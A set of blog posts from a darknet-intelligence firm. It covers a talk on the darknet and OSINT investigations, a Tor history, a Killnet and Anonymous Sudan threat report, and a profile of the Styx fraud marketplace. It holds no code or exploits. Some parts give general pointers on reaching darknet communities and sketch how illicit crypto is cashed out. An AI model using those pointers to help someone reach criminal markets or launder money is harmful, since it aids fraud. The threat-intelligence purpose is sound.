Author: DarkOwl Content Team

[Speaking Session Transcription] What is the Darknet and how is it used in Cybercriminal Investigations?

July 12, 2023


Have you ever heard of The Onion Router (TOR)? Have you ever ventured onto the dark web, maybe a forum or a marketplace? Or have you heard of Open-Source Intelligence (OSINT)? Or have you ever been curious to learn more about what it is like to work in cybersecurity?

The American University of Cairo welcomed Richard Hancock from DarkOwl, an experienced cybercrime investigator, to speak on the history and evolution of the darknet, how it is typically accessed, and how darknet data can be used in threat intelligence and cybercrime investigations.

NOTE: Some content has been edited for length and clarity.


Dr. Sherif Aly: It gives me pleasure to introduce Richard Hancock today, who works for DarkOwl. Richard has quite a bit of extensive experience in digital forensics and mining the dark web, if I can say. And it’s a good opportunity to hand it over to you to better introduce yourself and what you do.

Richard Hancock: Absolutely. Thanks a lot, Sherif. Thanks for having me and appreciate you guys taking time out of your day to listen to me speak about the darknet and all the cool things I see on there. So, I work for a company called DarkOwl. What we do is we have a user interface, a searchable user interface, that we give to clients that want to search on the darknet in a safe way.

Going into a little bit about my background before we go into what the darknet is and how to use it for cybercriminal investigations. So a little bit about my background. I have over 7 years’ experience as an open source intelligence investigator. I spent 4 years living in Amman, Jordan and Abu Dhabi as well. So some of the topics that I’ve focused on would be Arabic linguistics, counterterrorism, darknet intelligence, social engineering, and cybercrime.

One of the things I focus on right now, my current job title is Darknet Intelligence Analyst and Sales Engineering Team Lead. It’s a really long title, but kind of my everyday. What my everyday looks like is, I start out my day getting onto various darknet forums and marketplaces and I direct our collections team to collect from the most high value content – usually digital fraud goods, counterfeit items, things that would be of interest to our clients. So spending a lot of time in the darknet, and then also getting on calls and speaking to people to try to get them to pay for our platform. And I also wanted to share some of my other hobbies outside of this work because it is pretty serious work; you have to make sure that you have fun outside of work. After I lived in the Middle East for several years I returned back to Colorado, where I went to college, and I’m really big into backcountry skiing as well as DJing underground parties and house music.

What is the Darknet?

The surface net is what you guys would be most familiar with; this would be any websites that are indexed by search engines like Google, Bing, etc. The deepnet – that’s just a layer further, it’s still the same sites that you’re accessing through those same search engines. However, you need some sort of credentials, username and password, to get on to these sites. It could be Netflix. It could be social media. It could also be some criminal hacking forums that are accessible through the surface net.

The part of the Internet that we really focus on is here in the darknet. So in order to get on the darknet, it’s still technically the same Internet. But you need special software in order to access this hidden layer of the Internet, which is used for anonymous communication, selling drugs, or selling counterfeit items. This is the part of the Internet that we really focus on at DarkOwl.

You primarily access the darknet using all of this software right here. The one that is most popular would be Tor, also known as the onion router. I2P is also popular, and the same with ZeroNet.

The deep net, as I’ve mentioned, is still the same Internet but it’s accessible through search engines like Google and Bing and it can represent social media websites, Netflix, as well as some underground criminal forums that are not darknet specific. That would be like noel.to which is a hacking forum.

However, something that’s really increasing the last several years would be the rise of direct messaging platforms. So criminals are obviously going to be living on the darknet. They’ll be living on the deep web.

But how are they communicating with each other? Are they just using these marketplaces and forums to talk to each other? Not necessarily. An app that we’re seeing really on the rise right now is Telegram. And that’s primarily because it’s really, really easy to use. The cybercriminal ecosystem on Telegram is absolutely massive these days. Whether it’s right wing extremism, Islamic extremism activities, Russia, Ukraine and the invasion, misinformation, and people selling Netflix accounts, etc.

History of the Darknet

Let’s talk a little bit about the history of the darknet. When was it created? The Tor browser was created by the Naval Intelligence Unit in the CIA in the United States, back in 2002. It was originally used as a way for agents to communicate with each other in the field, so primarily in places like Iran or Russia. It was just for military intelligence and communication. Since then it has evolved a little bit. It then evolved for agents to use the Tor browser to communicate with their family members, and then the next step was the Tor board of directors allowing public use of the Tor browser for free speech, for activism, for journalism, and then obviously cybercriminal ecosystems quickly grew on here.

So, going into this a little bit further, Bitcoin was created in 2009, and that’s what really facilitated the emergence of the marketplaces and forums, because it allowed people to buy things and make transactions. And in an anonymous way.

The first really big marketplace was the Silk Road. If you guys are familiar with this, you might know the guy, the founder, Ross Ulbricht. There’s a lot of good movies on Netflix, or documentaries that you could probably find on YouTube about this instance. If you’ve not heard of Ross Ulbricht and Silk Road, I highly encourage you to check out that story. It’s quite fascinating. He ended up getting arrested by law enforcement in 2016, which marked the shutdown of the Silk Road. And I actually know some of the people who were involved in that investigation, in the arrest of that individual. As the darknet has continued, we’ve seen an increase of law enforcement presence and the rise of something called honeypots. So that’s when Ross Ulbricht, the Silk Road founder, was arrested. At that point, that is when we really saw an increasing presence of law enforcement on darknet marketplaces, forums, etc. It really started with a lot of American-centric law enforcement presence but quickly expanded to other countries. And I will tell you from personal experience, one of the most savvy NATO countries in terms of darknet investigations would definitely be the German Government. The German Government is very skilled with darknet cybercrime.

2020 marked the twentieth year that the darknet has been around. The future of the darknet is really going to be interesting, because we will always see things like Tor. People will probably stick around. But as I mentioned, we’re really seeing an increasing use of chat applications which are not part of the darknet. But let’s say you’re a ransomware actor – you’re definitely going to be using Telegram just like you would those forums and marketplaces, or in the [.] onion sites where you start, where you actually are hosting corporate leaks, databases, and things like that.

Content in the Darknet

There’s a lot of different things on the darknet. Some things that are really popular in the media about the darknet would be drugs or assassins for hire, and while those things definitely exist on there, it’s not very actionable, especially for the kind of clients that we help in the kind of investigations that I am doing. The primary content that we’re seeing is hacking related. So whether that’s somebody that’s developed an exploit for a specific tool, somebody’s leaked source code for a particular company, or maybe somebody’s sharing leaked databases that contain usernames and passwords associated with like admin credentials for a company.

You know, there’s a lot of different things you can see on there: counterfeit items, passports, pilot certificates, cryptocurrency, fraud, credit card fraud is super widespread. And then, as well, as you know, drugs, weapons, there is quite a bit of child exploitation, child pornography material on the darknet as well. Unfortunately.

So pointing out some additional examples and some of the things that we are able to collect when we’re crawling from the darknet:

So when we’re crawling information from the darknet, we’re not scraping pictures like this [see image above]. We’re just scraping the raw text. In this specific example, we’re seeing somebody who’s hosted this information on a [.] onion site. I’m not sure how serious this threat was, but they were claiming to be targeting Donald Trump and Mike Pence for an assassination, and they actually included a QR code with a Bitcoin wallet address, and we were able to track that wallet. This is the kind of information that investigators use within our platform and our data to pull on strings and investigate individuals further, because if you’re able to identify a Bitcoin wallet with an individual on the darknet you can search upon that Bitcoin wallet and see where else they might be using it, maybe on Telegram, a marketplace or a forum. As I mentioned, there’s a lot of counterfeit documents being sold on the darknet. During Covid we saw a lot of Covid scams, tons of counterfeit, fake Covid documents, vaccination cards, as well as we see passports, driver’s licenses, certificates and other things as well.

I did mention that there is an extremism presence in the darknet. When ISIS was starting in 2014, they actually did have quite a big presence on an onion site. However, today we’re not seeing a very big presence of Islamic terrorists, Islamic extremist groups on the darknet itself. However, we do see quite a bit on Telegram. So this specific shot is from a group known as Jerusalem Electronic Army, which is loosely affiliated with some Hamas cybergroups. And this is issuing out a target for a water sanitation facility in Israel. And these kinds of attacks, cyberactors targeting industrial control systems for critical infrastructure, is definitely something that’s on the rise. We’ve seen that in Russia, Ukraine. We’ve seen it within the United States, and I can tell you from a Federal government level within the United States, we’re putting a lot of money and effort into building coalitions between agencies to monitor these types of things. Sometimes here at DarkOwl, we actually get agents who ask us specific questions about threats to critical infrastructure. So it’s something that’s on the minds of a lot of people these days. As I also mentioned, drugs are really big on the darknet, going back all the way to the beginning of the Silk Road. That’s what it was primarily used for. I would say, again, it’s probably not the most popular part of the darknet these days. Like I said, it’s going to be that hacking information – basically selling data on individuals and corporations.

This specific screenshot is showing AlphaBay Market, which is a really popular market that had temporarily gone offline after a law enforcement seizure, and then did come back online in 2021. This is something that we’ve seen quite a bit in the last 2 years. I know recently 2 marketplaces that have been shut down: Genesis as well as Monopoly market.

Something that a lot of people in my industry are very skeptical of is when a marketplace is offline by law enforcement seizure, whether it’s Interpol or the United Nations, Drug Enforcement, or whatever it is, if that marketplace or forum returns, at a certain point we pretty much consider that to be co-opted by law enforcement. So probably the admin of that site has been arrested, and maybe they’re using that admin for their skills and things like that. But they’re continuing the existence of that market or forum for the primary purpose of collecting information on individuals and surveillance.

I also mentioned credit card fraud, which is really widespread on the darknet. There’s just huge databases out there that people can easily pay for, that include credit card numbers, BIN numbers, as well as the personal identity, the PII, associated with the individual’s bank account information. So that’s really widespread in the darknet, as well as people who are selling methodologies to target specific banks. Maybe it’s check fraud, wire fraud, all different types of fraud. It’s really widespread not just to sell access to somebody’s credit card information, but actually to sell access to information, how to commit fraud against a bank or a credit card company.

Right here is an example of telecommunications fraud.

This specific example looks like spoof calling in India. This is absolutely widespread. Any company that has a large mobile application user base, so whether that’s Coinbase, Netflix and those kind of companies, are going to be targeted for fraud the most on the darknet. It’s actually, it’s pretty funny. And a lot of the investigations that we’re going through, from a government level, people are always asking about sophisticated nation state actors. But I’ll tell you, the people that I interact with the most on the darknet are really eager, like 15 to 17 year olds that are trying to become hackers. And for a long time people weren’t taking these individuals seriously because they’re like, how seriously can you take a teenager? Well, I can tell you that most of the fraud of those companies I just mentioned, UberEats and Netflix, etc – that type of fraud is usually perpetrated by teenagers, and it’s quite often these days when their parents aren’t home, a 15 year old, hanging out with their buddies Friday night, rather than you know, maybe 10 years ago, trying to take money from their parents’ purse, they’ll actually try to steal somebody’s Pizza Hut account on Telegram and get free pizza for the night. So kind of funny, the world that we’re living in today.

So different types of cryptocurrency used on the darknet.

If you want to purchase something in the darknet, be it a legal or illegal item, cryptocurrency is how you purchase that item anonymously. These 6 cryptocurrencies that are most used are: Bitcoin, Monero, Ethereum, Zcash, Dash, and Litecoin. There are others, for sure, and you will actually see on one of the emerging parts of the darknet called Loki – they’ve actually created their own cryptocurrency within their network, which is pretty sweet. Cryptocurrency is the primary vehicle for illegal transactions on the darknet, and as I mentioned, monitoring cryptocurrency and wallet address activity is a really good way to monitor cybercriminal activity. And when we’re dealing with law enforcement, this is one of the primary vectors and the primary information that they’re searching within our platform.

How do we get to the Darknet?

I had mentioned Tor, the onion router. This is the primary way people get to the darknet and, as I mentioned, it was created all the way back in 2002 – I’m sure it looked a little bit different. When you do get on the darknet, you can enter addresses above in the search bar, or you can search on DuckDuckGo. But the thing that you guys need to understand about the darknet is this is a community and you can only find information if you become an active member of the community. So what I’m trying to say is, if you want to search in that search bar, show me the top 10 criminal marketplaces – you’re just not going to get anywhere. If you’re a new threat actor, you’ll start on one site and that’s called Dread. Dread is the Reddit equivalent of the darknet. It’s a great place for young hackers to start their journey and to find links to different marketplaces and forums and basically to interact with users who might be vendors selling illegal items on those forums.

Dread is kind of the starting point, if you will. But you need to know what the URL is for that; there might be a way you can use some open source, Google dorking technique on Google to find some links for that. But it’s really a need to know. And yeah, as you find more and more links, you get deeper and deeper into these communities.

There are other ways to get to the darknet. It is really popular, this actually re-surged in popularity since the Russian invasion of Ukraine. So there’s a huge, heavy Russian language cyberactor presence on this site. It’s a lot more difficult to set up than Tor. If you want to set up the Tor browser, you really just need to have a pretty basic understanding of setting up virtual machines, manually configuring proxies and downloading the Tor browser, and using burner numbers and things like that. But I2P is a bit more technical in terms of setting up the server. And it’s something that I’m actually trying to learn more about this year, because it’s a part of the darknet that’s been growing recently, especially with the Russian cyber threat actor community.

There are other ways to get there. There’s a lot of different ways to access the darknet. The one I primarily use is gonna always be Tor, but also ZeroNet and FreeNet. What you need to know is the darknet’s evolving and changing constantly. I keep mentioning Loki, and that’s because it’s quite interesting, because they have their own cryptocurrency known as Oxen.

How is Darknet Data used in Cyber Investigations?

So darknet intelligence is just one component of open source intelligence. Open source intelligence – there’s social media intelligence, there’s private intelligence. There’s a lot of different kinds of intelligence data feeds that investigators use to conduct investigations. Darknet data is really useful to add into the full spectrum of sources that you’re using, so you can make informed, strategic decisions, right? So if somebody’s looking at somebody’s username on the clearnet, maybe on a social media website, maybe they’re using a similar username on a darknet forum or some other tools.

If you guys are interested in open source search techniques, Michael Bazzell’s book right here. This guy is awesome. He is really, really, really knowledgeable and he’s got the most extensive book for all the different types of open source intelligence searching techniques. If you guys are interested in this stuff, I highly encourage you to check him out.

And here’s a quick example of basically what I was explaining: searching a username on Google and then eventually leading out to darknet forums. So in this specific example, we found somebody had asked us about an individual who goes by the name of Ninja Shopper. So we first search that on Google and find a YouTube page. And then we were able to find actually a Discord server where this individual has a presence as well as another alias. We found this guy and his sunglasses over here, and his long beard – looks like a pretty typical sitting-behind-the-computer threat actor. We were then able to find a GitHub account, which gave us more information, which eventually led us to this male avatar with unique sunglasses, and then searching for this username, these 3 usernames, I should say, we were able to find this individual’s presence on darknet forums like RaidForums. Some personal information was leaked on RaidForums. So this is just showing you that these are the kinds of investigations that we’re doing all day. Some of the other illegal activity you’ll see out there is cyber espionage, threats to public officials, child abuse materials, wildlife trafficking, domestic extremism, drug trafficking, threats against critical infrastructure, credit card fraud, telecommunications fraud, counterfeit documents, malware, and a lot more.


Interested in learning how DarkOwl can help with your darknet investigations? Contact us.

OSINT Combine Renews Partnership with DarkOwl to Give Clients Continued Access to Darknet Data

July 10, 2023

OSINT Combine, Australia’s premier OSINT training and software provider, is thrilled to announce a renewed strategic partnership with DarkOwl, a renowned darknet data leader. This collaboration will continue to empower OSINT Combine’s clients with access to DarkOwl’s extensive darknet database, bolstering their open-source intelligence capabilities and enabling them to address complex operational requirements more effectively through training, software solutions, and consulting services.

Chris Poulter, Founder and CEO of OSINT Combine, emphasizes the strategic significance of the partnership, stating: “Renewing our partnership with DarkOwl will allow us to continue to provide our customers with the top darknet data available on the market. Their commitment to supporting time-sensitive activities aligns perfectly with our organization’s mission in offering solutions to combat human trafficking, terrorism, and provide support to law enforcement, corporate entities, and personnel protection domains. We are excited to continue to use DarkOwl’s expertise in the darknet to expand our NexusXplore platform.”

OSINT Combine has a proven track record of developing robust OSINT capabilities within strategic organizations globally, offering advanced training and software solutions to government entities such as national intelligence agencies, tri-service military units, local and federal law enforcement agencies, as well as private sector organizations including Fortune 500 and ASX 200 companies.

Mark Turnage, CEO of DarkOwl, praises OSINT Combine’s outstanding work and is thrilled to be able to continue supporting their remarkable mission, stating: “OSINT Combine has demonstrated exceptional expertise in their field. By leveraging DarkOwl’s vast and continuously growing database of darknet data, they will be able to train their clients on effectively utilizing the darknet, which often holds crucial information for investigations. This demonstrates that they are committed to offering sophisticated solutions to their clients.”

About OSINT Combine
OSINT Combine is committed to the innovation of open source intelligence by providing leading edge technology solutions and unparalleled expertise. Our mission is to develop enduring open source intelligence capability within strategically orientated organizations, and we are trusted by federal law enforcement, national security agencies, global banks and Fortune 500 companies worldwide. For more information, visit www.osintcombine.com

About DarkOwl
DarkOwl uses machine learning and human analysts to automatically, continuously, and anonymously collect, index and rank darknet, deep web, and high-risk surface net data in a way that allows for simplicity in searching. DarkOwl is unique not only in the depth and breadth of its darknet data, but also in the relevance and searchability of its data, its investigation tools, and its passionate customer service. DarkOwl data is ethically and safely collected from the darknet, allowing users secure and anonymous access to information and threats relevant to their mission. For more information, visit www.darkowl.com.

[Interactive Timeline] Tor and Beyond: Key Developments in the History of the Darknet

July 06, 2023

While the darknet is comprised of many different hidden networks, The Onion Router (Tor) is by far the most popular and well recognized. In 2006, when the US Naval Research Laboratories handed over Tor to a group of volunteers at the Tor Project, the network’s purpose was to provide a decentralized, censorship resistant platform for users to communicate and share information.

The Tor platform quickly became a haven for criminal activity, facilitating anonymous communication across underground digital communities and forums, elaborate drug marketplaces, child pornography and human trafficking. Consequently, de-anonymizing onion services hosting criminal content has been a focus of many three-letter government and law-enforcement agencies around the world. Academic researchers and computer network science experts have received numerous grants and government funding to extensively study de-anonymization attack methodologies and have subsequently published numerous journal articles on the subject, a number of which are cited here.

Over the years, DarkOwl has witnessed successful de-anonymization through various techniques including rendezvous point circuits (a.k.a. the cookie attack), time-correlation attacks, distributed denial of service attacks, which often force a criminal onion service onto a LE-controlled guard node (a.k.a. the sniper attack), and circuit fingerprinting attacks.


While the Tor platform was built to offer a solution to individuals trying to avoid government surveillance and censorship, Tor has also allowed for dark websites with illegal content to flourish. The availability of private browsing networks such as Tor gave rise to other dark websites, communities, and forums. In recent years, the communities who use these technologies have increasingly overlapped with users of dark web adjacent tools that more closely resemble instant messaging platforms, such as Telegram and Discord. For this reason, DarkOwl does not limit their darknet collections to onion sites, but also aggregates data from other technologies such as ZeroNet, I2P, and transient surface-web paste sites.


To learn more about developments on the darknet, subscribe to our newsletter.

Threat Intelligence RoundUp: June

July 03, 2023

Our analyst team shares a few articles each week in our email newsletter, which goes out every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Car pentesting growing in importance as autos become more connected – IT Brew

The world is becoming more and more tech-centric, and that includes the automotive industry. This shift in car technology demands that cars become more secure, in the tech and cyber sense. This article highlights the importance of penetration testing (pentesting) for electronic control units (ECUs) to secure them against hackers. Read full article.

2. Swiss government warns of ongoing DDoS attacks, data leak – BleepingComputer

On June 12, the Swiss government announced that one of their IT suppliers had been a victim of a ransomware attack and that their data may have been impacted. They then warned that they are now a target of DDoS attacks. These attacks highlight the complex third-party environments almost all organizations and government entities face. Read more.

3. EncroChat takedown led to 6,500 arrests and $979 million seized – BleepingComputer

Last week, Europol announced that they had arrested over 6,600 people and seized $979 million in illicit funds. This came after the takedown of the EncroChat encrypted mobile communications platform. Learn more.

4. APT37 hackers deploy new FadeStealer eavesdropping malware – BleepingComputer

APT37, also known as ScarCruft, Reaper, or RedEyes, is a state-sponsored North Korean hacking group that has a history of cyber espionage attacking North Korean defectors, educational institutions and EU-based organizations that do not align with the North Korean government’s interests. They are believed to be using a new “FadeStealer” information-stealing malware which has a “wiretapping” feature. This feature allows them to listen and record from their victims’ microphones. Read full article.

5. New ‘PowerDrop’ PowerShell malware targets U.S. aerospace industry – BleepingComputer

Adlumin discovered a new PowerShell malware script named “PowerDrop.” It was discovered being used in attacks against the U.S. aerospace defense industry, when a sample of the malware was found in a U.S. defense contractor’s network. Read more.

6. Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor – The Hacker News

A Chinese state-sponsored actor, Flea (also known as APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda), has been targeting foreign affairs ministries in the Americas from late 2022 into early 2023. The group is linked to cyberattacks targeting governments, diplomatic missions and embassies since at least 2004. Read full article.

7. SmokeLoader Malware Adopts New Tactics, Raises Serious Security Concerns – The Cyber Express

At the beginning of June, the Computer Emergency Response Team of Ukraine (CERT-UA) uncovered a new cyberattack campaign named UAC-0006 that involved distributing SmokeLoader malware, using compromised email accounts and multiple delivery methods. This attack is a sign of TTP changes and expansion. Read more.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Killnet and Anonymous Sudan: Identified Link

June 26, 2023

Using DarkOwl Vision, DarkOwl analysts have been monitoring activity related to the Killnet group and identified threats made in the past week relating to the European financial system. As part of this analysis, DarkOwl analysts have identified a link between Killnet and the group Anonymous Sudan.

The First Telegram Post

A post appeared on Telegram on June 15th from the Russian news site Mash which indicated that the threat actor groups REvil, Killnet and Anonymous Sudan were combining in order to mount an attack against European financial institutions. The Mash article was re-posted on both the Anonymous Sudan Telegram channel and the Killnet channel.

The original posts indicated that attacks against European financial institutions would begin within 48 hours of the news article.

No clear indication has been provided of what the nature of the attacks would be, but Killnet has historically been responsible for DDoS (Distributed Denial of Service) attacks, in which a network is rendered inaccessible by flooding a server with useless network traffic, exploiting the limits of TCP/IP protocols. Most of the posts that have been made have also been posted on the channels of both Killnet and Anonymous Sudan, indicating that there is some collaboration between the admins of these channels.

A new Telegram channel was set up purporting to be from the group REvil. This channel welcomed Killnet and also posted a poll for followers of the channel to vote on which financial system in Europe they would like to be targeted. Other than an image of cryptocurrency, nothing else has been posted on this channel to date.

Who is REvil?

REvil is a group that conducted ransomware attacks and was assessed to be based in Russia. The group was successful in targeting a number of corporate organizations including Apple, JBS and Colonial Pipeline. In 2021 the group appeared to be disbanded by joint law enforcement actions and their infrastructure was dismantled. It is unclear if the actors reported to be part of this action were previous members of the REvil group or if they are using their name due to their notoriety.

While there has been some reposting of REvil posts on the Killnet and Anonymous Sudan channels, the REvil channel has not reposted anything from the other groups. Furthermore, in later posts by Killnet and Anonymous Sudan, REvil is not mentioned, which may indicate they are less involved in the activity.

Anonymous Sudan and Killnet Acting Together

On June 16th, both Anonymous Sudan and Killnet posted a message suggesting that there were issues with the IBAN banking system. No reporting was identified that indicated that this was the case. The below screenshot is from DarkOwl Vision.

On June 19th, Anonymous Sudan made a post, provided in both Arabic and English, indicating that an attack was imminent, that the reported timeframe had been set by the media, and that the timeframe referred to when their attacks would take place, not to when the results would become evident.

On June 19th, Killnet claimed that they had attacked the European Investment Bank. They provided a post indicating that the attack against the European banking system had begun, along with a screenshot from Wikipedia giving details of the European Investment Bank. The message was signed by both Killnet and Anonymous Sudan.

The channel then provided posts which appeared to show that there was an error on a European Investment Bank page.

They then reposted another article from the Mash Telegram channel which indicated that the European Investment Bank was being targeted by Russian cyber criminals. This included images from the Telegraph, a UK newspaper, and a tweet by the European Investment Bank indicating that it was the victim of a cyberattack. Open-source reporting indicates that the cyberattack was affecting the availability of some of the bank’s websites.

The attack on the European Investment Bank appears to have only affected its websites and is likely a DDoS attack. This is activity both Killnet and Anonymous Sudan have conducted in the past, and it is unclear whether they have other capabilities that they will utilize. It is possible that the groups were using the name of REvil to suggest they had further capabilities, given that group’s previous reputation, but there is no data to support this at this time.

On June 21, Killnet posted a claim that the International Finance Corporation (IFC) had been taken down.

[TRANSLATED IMAGE]
Goodbye 🤚
Unfortunately, the IFC is no longer working, we ask all partners and staff of the Bank’s organization to go #uy 🖕
The International Finance Corporation (IFC; English International Finance Corporation, English IFC) is an international financial institution that is part of the World Bank. The headquarters of the organization is located in Washington (USA, 2121 Pennsylvania Ave NW, DC 20433).

No evidence was provided to confirm this attack and no reporting has been identified to indicate that the IFC has been successfully targeted.

Other posts on the Telegram channels are targeting other organizations, reposts from other sources or requests for donations to be made.

Conclusion

While these groups have claimed that they will bring down the European financial system, there is little evidence to suggest that they are following through with the threat. Furthermore, the capabilities that these groups have historically utilized suggest that any attacks which take place are likely to be DDoS attacks. DarkOwl will continue to monitor for any further activity.



Darknet Marketplace Snapshot Series: Styx Market

June 21, 2023

In DarkOwl’s Darknet Marketplace Snapshot blog series, our researchers provide short-form insight into a variety of darknet marketplaces: looking for trends, exploring new marketplaces, examining admin and vendor activities, and offering a host of insights into this transient and often criminal corner of the internet. This edition features Styx market.



What is Styx Market?

Styx is a darknet marketplace selling illegal techniques for committing fraud, money laundering, and access to stolen data. Chatter on the darknet around Styx market first appeared in 2020 before the marketplace officially opened in mid-January 2023.

Figure 1: Captcha to Styx Market; Source: Styx Market

Styx market offers stolen data as well as a variety of products for conducting illegal cyber activities. Examples include 2FA/SMS bypass, Business Full Info/Tax, Installs for stealers, Anti-detect browsers, laundry services, FB/Google logs, Cashout Banks/VCC, Credit Cards (CC), Crypto-mixer, Stealer services, Look up BG/SSN/DOB, RDP (remote desktop protocol)/VDS (virtual dedicated server)/VPS (virtual private server), and many more. A table of definitions can be found at the bottom of this blog.

Figure 2: Homepage of Styx Market; Source: Styx Market

Infrastructure of Styx Marketplace

Styx marketplace is divided into five main sections: the main page, trusted sellers, auto ESCROW, news, and a filters section to search for specific products on the left side.  

The main page of the marketplace has posts by users advertising what they sell on the market. Usernames are not assigned by the site and can be chosen by the user. The majority of the site is in English and is therefore easy to navigate for English speakers. However, many listings and vendor names are in Russian. This includes vendors on the Trusted Sellers page. Vendors on a trusted sellers page have typically been vetted by the administration running the site, and are therefore considered more “trustworthy”.

DarkOwl analysts assess many sophisticated darknet actors are Russia-based. Therefore, the fact that some vendors and their listings are Russia-affiliated adds to the legitimacy of the marketplace. There are noticeable spelling errors throughout the site in some of the listings posted by vendors. In some cases, a listing will include both a Russian and English translation. Some of the filters that can be used to search for specific products or goods offer a Russian translation right next to them.  

Many kinds of stolen or leaked data are offered for sale in listings. Listings can be found on the main page and under News, and certain kinds of data can be searched for with the filter bar. Looking at individual listings, the personal data sold is noticeably mostly from the West. The kinds of data for sale are typically PII (personally identifiable information) and credentials, information that can be used for fraud and scams. For example, a hacked database of U.S. payday loans is available for $90. There are also Spanish national identification cards available. Many foreign governments issue national identification cards to their citizens, which are used while voting, traveling and applying for government benefits, and are used by law enforcement for identification purposes. Other personally identifiable information from the EU, such as credentials, is offered in multiple listings. However, multiple APAC (Asia Pacific) and Middle Eastern countries are also present on the site.

For payment, Styx market has its own ESCROW-enabled payment system. According to the terms and conditions of the marketplace’s auto-ESCROW, the maximum amount a transaction can be is $1,000,000 USD. The ESCROW system can also be used by buyers and sellers for dispute resolution. They can invite an Arbitrator by clicking on a support button. The Arbitrator takes 4% of each arbitration, and their decision is final.  

The infrastructure of Styx Market relies heavily on a Telegram component. 

In some cases, the “contact seller” button on the marketplace will lead directly to a Telegram channel. Vendors who rely on Telegram will typically have multiple channels tied to their vendor shop: one for administrative support and another for selling their products.

Figure 3: Trusted Sellers of Styx Market; Source: Styx Market

Focus on Financial Crime

The majority of services on the marketplace appear to be financial. Customer information for digital banking services such as Chime and PayPal is listed, as well as for more traditional banks including Capital One Bank, Wells Fargo, Citi Bank, and Old National Bank, among others. Access to cryptocurrency exchanges and Bitcoin platforms is prevalent across the site; sites such as Crypto[.]com, Coinbase, BitRue, Kraken, and others are listed by sellers to offer access to compromised accounts or to facilitate cashing out illicit funds. It is unclear from our research which of these two purposes a given account is offered for, but historically we have seen them used for both.

Figure 4: Wells Fargo Account; Source: Styx Market
Figure 5: KYC Binance Tutorial; Source: Styx Market

The products and data available on Styx can be used to help a cybercriminal at every stage of the financial fraud process. This could start with social engineering emails targeting CEOs, continue with lookup services used as reconnaissance to collect data on targeted individuals (such as a mother’s maiden name, the name of a family pet, or past addresses) that helps in accessing accounts, and end with creating accounts to drop and launder money. Lookup services are used by cybercriminals and bad actors for reconnaissance. They use lookup service information to help them pass verification and authenticate as their victim when they are committing fraud.

Figure 6: Telegram Channel for a Lookup Service on Styx Market; Source: Telegram

[TRANSLATED IMAGE]
☀️Search manually: 
DL ($8) 
SSN ($8) 
DOB ($2) 
EIN ($10) 
☀️Search via API: 
DL ($8) 
SSN ($8) 
⚙️Connect to the API and search 24/7 

Styx market also provides cash out and money laundering services. Multiple vendors claim to provide this service, and each has their own requirements. For example, the vendor “Verta” typically charges a 50% commission. They also have requirements for the minimum amount of money needed for a transfer: $15,000 minimum per transfer to a personal account and $75,000 minimum per transfer to a business account. 

Figure 7: Verta Requirements; Source: Telegram

Facilitating financial crime appears to be a major component of the services offered on Styx marketplace. Cash out vendors require significant minimum amounts of money for their services. Cash out services are used to turn illicit Bitcoin into fiat currency. This can be an issue if the service, such as Coinbase, requires users to use their real identity and to prove that the crypto funds are legal, neither of which a darknet actor would do.

Banks are wary of cryptocurrencies’ links to the darknet and will likely be hesitant to cash out large sums of crypto, or will raise a red flag and require additional documentation. Darknet cash out services help darknet actors cash out their illegal cryptocurrency by using their own methods to circumvent the system. Exact methods are hard to come by as vendors don’t publish what they are profiting from. However, one way includes using multiple Bitcoin wallets, running them through personalized mixers, and finding a Bitcoin buyer who gives cash in exchange. Another way is to send Bitcoin to a company that will charge a prepaid debit card.

Cash out services typically have minimums and high commissions, indicating that their customer base is made up of actors with illicit cryptocurrency gains who have enough funds that the cash out is worthwhile to them despite the high commission. These signals could indicate that Styx market has been designed and built for users who are already experienced in cybercrime, since they appear to have access to a high amount of illicit funds.

Unique Characteristics of Styx Market

DarkOwl analysts have observed that a unique characteristic of Styx market is its interconnectedness with Telegram. For each listing, the user has the option to get in contact with the seller directly to purchase the item. A “Get in Contact” button will either bring the user to a page with a chat box on the marketplace itself, or take the user to a Telegram channel. The Telegram channels are a mix of bots and direct access to the sellers themselves. Some Telegram channels, such as that of the money laundering service “Verta”, are used by the sellers to make their terms of service public and to publish positive reviews of their services. Positive customer reviews are key to gaining trust in the darknet community.

Limited descriptions of products are given on the site and users are often re-directed to a specific Telegram channel of that vendor. The Telegram channels are either a channel for direct messages to the seller or are the seller’s support Telegram channel.   

A Telegram channel is used to broadcast information to a wide audience; only admins are able to post and there can be an unlimited number of subscribers. A public group is similar to a channel, but all subscribers can post in the chat. Public channels have a username, and anyone can join. Private channels are only accessible if a user is added by the owner or receives a private link to join. Analysts have observed that it is common for darknet vendors to have multiple Telegram accounts, where each is used for a different purpose. One may be just for support, one could be for posting new products, and yet another might be for direct messages to the admin.

Figure 8: Link to Deviant Shop’s Telegram from Styx Market; Source: Styx Market

In the Telegram channels, descriptions of products and availability are shared. Buyers can also get pictures of the kind of products they are looking to buy as proof.

Figure 9: Deviant Shop Telegram Channel; Source: Telegram

A Look at the Vendors of Styx Market

To understand whether a darknet marketplace is sophisticated, it is important to assess the legitimacy and level of sophistication of its vendors. Trustworthy darknet marketplaces are more likely to have vendors with a considerable darknet footprint. More legitimacy is afforded to a vendor if they have been selling for multiple years, across different marketplaces, and have been evaluated to be trustworthy and not a scammer. Using DarkOwl Vision, the darknet, and darknet-adjacent sites, DarkOwl analysts looked at vendors from Styx market to review their footprints across the darknet. The vendors’ presence on the darknet will likely indicate whether vendors on Styx market are sophisticated hackers or skids.

The vendor shop “Valera888” sells PII, such as national identification documents, on Styx market. Using DarkOwl Vision, this same vendor’s username was found on darknet carding sites, a popular Russian darknet hacking forum, and other darknet marketplaces dating back to 2019. Although the same username used on Styx has appeared across darknet marketplaces in the past, there is no way to tell if the same person is behind those accounts. In the past the username has been associated with selling CVVs and private software. The username could be connected to the same user, since the accounts seem to follow a pattern of selling personal information, but this is unconfirmed.

Figure 10: Mapping Valera888 with information from DarkOwl Vision

“337 Diller” is a vendor on the trusted vendors page of Styx marketplace. This vendor offers lookup services.

Figure 11: Vendor Profile of 337 Diller on Styx Market; Source: Styx Market

